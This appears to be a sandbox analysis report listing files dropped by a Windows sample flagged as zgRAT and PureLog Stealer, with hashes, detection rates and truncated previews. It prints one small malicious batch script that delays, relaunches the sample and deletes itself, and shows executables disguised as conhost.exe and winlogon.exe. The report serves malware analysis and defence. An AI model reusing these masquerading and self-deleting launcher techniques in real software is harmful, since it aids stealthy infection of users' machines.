                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Joe Sandbox View:
                                                            • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....*(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z*....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

                                                            C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Program Files\Uninstall Information\c73aadd6ea7e5b

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):33
                                                            Entropy (8bit):4.4878932715826885
                                                            Encrypted:false
                                                            SSDEEP:3:gTbpQkaUyMdDC9n:gpQkfyMdm9n
                                                            MD5:EE9FFB8E0E124AED86A1047460BE3189
                                                            SHA1:B452E534DFA73FAE3BADE9D6E6A9A72228B3258E
                                                            SHA-256:5B76D56F64794F93D6E424E054670D8667D3A4564C6B53F8D9AE3D36464A7156
                                                            SHA-512:CD3AB7AB9D1AC26F5987A5672EF2AA83B124DDFE0FBD81F42E78A3B3C1E83D3FC910DE4428461DCC9538081683715DC79ABBAF3D7B28B37FE5553303F36688DC
                                                            Malicious:false
                                                            Preview:766Qc6Sk5rvADiqiGZw93b6idNr6LIhJz

                                                            C:\Recovery\088424020bedd6

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (516), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):516
                                                            Entropy (8bit):5.883314624840393
                                                            Encrypted:false
                                                            SSDEEP:12:zXXCchpLbyT/Qwi8e0n3wZCPD6TCl3QK3ZHF8qKHlLHRyy85p:zXXVbgQX3Y3wCoemW5p
                                                            MD5:E86147C65A26DCE1FD972244125CF6D2
                                                            SHA1:FF4592A0636614824CBD5A70A98375C04CC9380E
                                                            SHA-256:91C535120D9F013B2F93840A73BC10C3E3EA758E66C5C188D15472FA65566E9C
                                                            SHA-512:920FF6F9D2C6D57FB20DFE92931F7F3D8CC55F455250061B8534F77F062BBE0ACBD27FF7E2EC99FA594F5C4341C35DA38A49222730D5947B7794363D778C3430
                                                            Malicious:false
                                                            Preview:9XwOOVYxKlKbZHmVbvFYWmZSQt7lE1tVdmjh9swiGSJhAfh27tNpYuJW7d8eXxsS2z8wiEWt8hREc2SvMFoUoD7tdMkfuRKTj1oKguU3Xdq0cE3FKNSSJYnz2PTVe09rW8flOIObvu7KWGRYSfUg82KLOzSRb8Yge9edjS0C80gYaccw84C9fcsdyUXY079wWaqWlxzAoSiHVvuvWgSh6ZBCRAoP5cMA1uC9wFKKEBUN3kICjmCToc06ZnFkJkFMGiQltv8QVId4FyIq2lpTa2VZ3FjJAjBe6IGVTgSyov7g861lfYsh4wvNM1roLzQwG876rwXWS1pp4ya7O8nl1ekKW3JcyonyeLaA844sBVODGGTXbuZNLp4mYxjyn4hoN0KtYZ9TD5jfPgDPkvAEOanzQxlLUGEGykzQ6j8BuGJPFZW1tTO14dZxMVclxx870crprwTAx9TIQXt1aubB2MMUKBEkHXN7HMZmrrK6ANE4JRgymkKDW7EnQWfpst2ZwWAE

                                                            C:\Recovery\KcduafKotlNaKVM.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Joe Sandbox View:
                                                            • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....*(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z*....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

                                                            C:\Recovery\KcduafKotlNaKVM.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:false
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Recovery\c73aadd6ea7e5b

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (466), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):466
                                                            Entropy (8bit):5.85421798396483
                                                            Encrypted:false
                                                            SSDEEP:12:tDDcy3RsrqNu/A3bVF4tWLmPneMO/IALN0eDeXJ:NDcyhssu/+J+qmWLuSeXJ
                                                            MD5:B4A6A3BED546516AEC772C7A8426FF30
                                                            SHA1:65377C9C1754AACD25E2AFBC1FEC8D8166AB66A6
                                                            SHA-256:4129A07C155366A6DC5F9937001A7A23BCEF178D661DE67F34A5A4000360E33D
                                                            SHA-512:3937D24EF0307B20F06A0CD9BCF13B1C12CC9B2E9899420A1CBBEFA6C943F4EBD8EDC1CCC5280054F65A9878C14012F9E05C8E04C56409B5C9FDC864FB151453
                                                            Malicious:false
                                                            Preview:VWCU51T4BnhagmPiscXsj1IcG5OYSF0ArarlVoVfJV3dFFAw1nQHQF2dOkO9n5m5wgtG5oMEH1iO8oWA4bgoyttlhNWvaV2Os7riW41NaM9YhofjNNFLY7HCwIirRbnv9TfA7yoAkTNmuVE3sxiMQq0v0ovOWJ59iNZNIelYjFlEteSbDo8e3bfTduJSDanaYOEg60uOLJnLFvBWWTKrKaGHrFtXVSVIbKqfaveM4uTtxUNrsx6tQ6Q7I6y0HX22yeu4Fg5kz7xaHWTX1BphWl2e4sWd7oFg1a5SkTmM1V4SJz0vnb8FrVgNmPAWJbnK1QiqbAxiZdqArkUE2k0fpAzg4rqUSPCZsta3QJUmoZpOoffB45djlHe1bCwtUcPJbQS7JbytQO1PUk1YLoaXvcykOjcOXkSLKgxYNi2dHuTWQPg0LXhpC2X8brsj9kWp6pFywcKnw7QBJcU9Cl

                                                            C:\Recovery\cc11b995f2a76d

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (613), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):613
                                                            Entropy (8bit):5.884570909762723
                                                            Encrypted:false
                                                            SSDEEP:12:MmoBImUNKGwiwPlJXCTQDalCVWOK5o1N76HQwtO140ZcN7zcdkBa1SwRV:00wjXCTialh5oawwtodkgkC
                                                            MD5:F23DAA590CCBBD722999DA811BDD48D1
                                                            SHA1:08DAED4305C4C10F0FF7CF54441B98B421EA0372
                                                            SHA-256:9A819E3F3E82DF38A53ECE476096C3AF9DAC85F3ED95BBF27B731A510CC78019
                                                            SHA-512:6F53E3A72D53BFCD65CCEEBB312CF00F32C1E8BA40344FEE847B0E9B88ECA104F15ED6F316AC57F26983FA9DB2F9BDEDC861ADA8F0EDDFBE1C7C4032EB884EBE
                                                            Malicious:false
                                                            Preview:34jwSJEPxCnQlp7hdZkaKEDtQ2N2WSczCgt5Hmah5uRxiaoek1U9ETaz1zgZ5M3fkxNF5BZ08DeawQKzOtSf7cvtF3ESGBlt0wMvMiiiceBBzADkoqKM4YhICe9B7Ht7buk9EZnpKtCdbu4F0ena0ZzcPEtsjglVuDjEZDfODeBKVDqRj4LddTGB4Iu9q4GoHrtXK0px8YXVYoGLXbIoVI1a6hJRSfiIYWDnUTGtOYfE6unQBjmPwbT90SanqXec0P7Blc0EUYZ6nxeM33Qt3TV6DDxC2dD03CNrwmoish4XBWWCxOtxHuih3B7ipyM0VjCkjxZROrBWY84rquOnuPtJeqxvpG34VEBcTwdAzciasMJ5HQ14jiFFz3G29omIyHBT6bX4RNySrSaSh2nYO8Uw85maqkBL0ZmlLz9q27nWuxYhcxVGAN40xOVAy7OrMncSqyGr37gQV8CKhF72O5Kmevy6d824t6KHVG0nrnMDrofyMKdsAVcQczx4AKN5FlhYy5zaOTLlsH50Q9uTfJ4Xd3ofT6ngZR8GGGARVCdqK1iU36nAa4Z5qJ45QTHSqoLaJztK9c8dpNNmUUmWSmGf2CZ7LFBB4LAfp

                                                            C:\Recovery\conhost.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....*(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z*....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

                                                            C:\Recovery\conhost.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Recovery\winlogon.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....*(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z*....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

                                                            C:\Recovery\winlogon.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\150bIjWiGH.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):1698
                                                            Entropy (8bit):5.367720686892084
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                            MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                            SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                            SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                            SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                            C:\Users\user\AppData\Local\Temp\GKtkfBoISL

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.373660689688184
                                                            Encrypted:false
                                                            SSDEEP:3:Xl5pALKD:VCKD
                                                            MD5:66AFC0A5D6F1C77CC79375DD57471564
                                                            SHA1:D94897FC9F669BF1859031FED5B37BC352A5C1F5
                                                            SHA-256:1589DB90DC363FB95344F9D937E023B6442E440402CB7E76EEB8C035D4D4EED6
                                                            SHA-512:1EDD816C6FB6BB56D86D0C0714A7D0A0C67744A2F1C3C70AF0085C3F22DB0DA17A42E221F418DE5176C27BCE8D5F3D3E087041A8AEDE55FC9C3412022E132C7E
                                                            Malicious:false
                                                            Preview:3fQ7gMJlKHvWULeOQVoIxQbzf

                                                            C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):213
                                                            Entropy (8bit):5.1268381674417425
                                                            Encrypted:false
                                                            SSDEEP:6:hCijTg3Nou1SV+DE1wvUmLCvKOZG1wkn23fJMYH:HTg9uYDEmMnDfxF
                                                            MD5:4B13E93194C9762C5D429A7088D4DF12
                                                            SHA1:75996F83756F7C01812C65DD4C0B346C1E514891
                                                            SHA-256:982BC0345307A81756682CC95D97CEC61C821D81A3454414BBC5694432DA9DDA
                                                            SHA-512:D8877D2F6B4E6CC547ADB2DB90770A9CFC51A0209020DDC3AD516A821DDDF60BA61ECFBC3D460A5C5CFCFBF0768461429E1A219297191F05F8F27F75A9C8038C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\150bIjWiGH.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\abd16af8Ll.bat"

                                                            C:\Users\user\Desktop\5f0cb11f2ad92d

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (312), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):312
                                                            Entropy (8bit):5.786407035296692
                                                            Encrypted:false
                                                            SSDEEP:6:dK0SvPiFa/nkZm4egbY34d+nnxRzli1ktxQwmmWKFViCynhlKKV2L3MY8mv:d3qWa/kZm4jkXpEWXP1ypmv
                                                            MD5:35869CF70F018A808D98F99C38781702
                                                            SHA1:F99D7879AB59F153CDA5584D914503D7A0564FDA
                                                            SHA-256:AC906CAF331B4705EF49321EA75EBA3FE4F2838B273EB92ECE33343F20CE7BBE
                                                            SHA-512:55B4BACDBEC918A031B3B83F5AF691AB3F48EDF1A737A272F1F43ADD749CB55ABF0231FDC6B3B773A4C4BCA62DE4DA5A5D4FA34AA52C63BC335F8245C520B9A7
                                                            Malicious:false
                                                            Preview:9Bry6VAx4TV9TjH6izLtvHGz5hH4S8eNcpZAtO29mfgGbUuK3qDQV2h2422YOGf6yIgoKGNU7MGQk9Xkw6Am4N1kIhG0VdufAjSTxGAwctTIvQR4fSmRF3BlQ6gmAW9dbkQArDwq6NJL4sz1PLVC0caHiqD1kXwGtzqKAQMbf6V1t0qhHoXzA6m9KJcBA5GibDbEBo1884h4HiXs9fu5A7FxMrA1yLbk0waqYmfcxY0GZs1mvuBeKKie8o1TnAKwd6EVHrTX9RIlG8Xe0YFDK6ZpN6stuLzwOEncngeEanf3C7X9QXdP4Gmg

                                                            C:\Users\user\Desktop\BDOgJEwE.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                            C:\Users\user\Desktop\CBqofELz.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\EOEXonVW.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\FInxAXGv.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\HwrGmkBt.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
